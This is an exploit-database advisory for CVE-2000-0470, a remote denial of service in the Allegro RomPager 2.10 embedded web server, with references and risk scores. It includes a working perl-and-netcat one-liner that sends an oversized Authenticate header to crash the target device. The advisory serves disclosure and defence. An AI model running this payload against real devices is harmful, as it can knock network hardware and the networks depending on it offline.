Allegro RomPager 2.10 - URL Request Denial of Service

🗓️ 01 Jun 2000 00:00:00Reported by netsecType

Allegro RomPager 2.10 has a remote denial of service vulnerability that can crash devices.

Reporter	Title	Published	Views	Family All 9
Tenable Nessus	Allegro Software RomPager 2.10 Malformed Authentication Request DoS	27 Jul 200500:00	–	nessus
CVE	CVE-2000-0470	13 Oct 200004:00	–	cve
Cvelist	CVE-2000-0470	13 Oct 200004:00	–	cvelist
EUVD	EUVD-2000-0469	7 Oct 202500:30	–	euvd
exploitpack	Allegro RomPager 2.10 - URL Request Denial of Service	1 Jun 200000:00	–	exploitpack
NVD	CVE-2000-0470	1 Jun 200004:00	–	nvd
OpenVAS	Allegro Software RomPager 2.10 DoS Vulnerability	26 Mar 200600:00	–	openvas
OpenVAS	Allegro Software RomPager 2.10 Denial of Service	26 Mar 200600:00	–	openvas
seebug.org	Allegro RomPager 2.10 Malformed URL Request DoS Vulnerability	1 Jul 201400:00	–	seebug

Allegro's RomPager is reported prone to a remote denial of service vulnerability.

If a specifically-malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser. 

CVE : CVE-2000-0470
BID : 1290
Other references : OSVDB:1371
Nessus ID : 19304

The following example is made available by Seth Alan Woolley:
$ ip_address="some.ip.add.ress"
$ ping $ip_address # works

the one-liner:
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80

$ ping $ip_address # doesn't work

01 Jun 2000 00:00Current

6.6Medium risk

Vulners AI Score6.6

CVSS 27.5

EPSS0.03469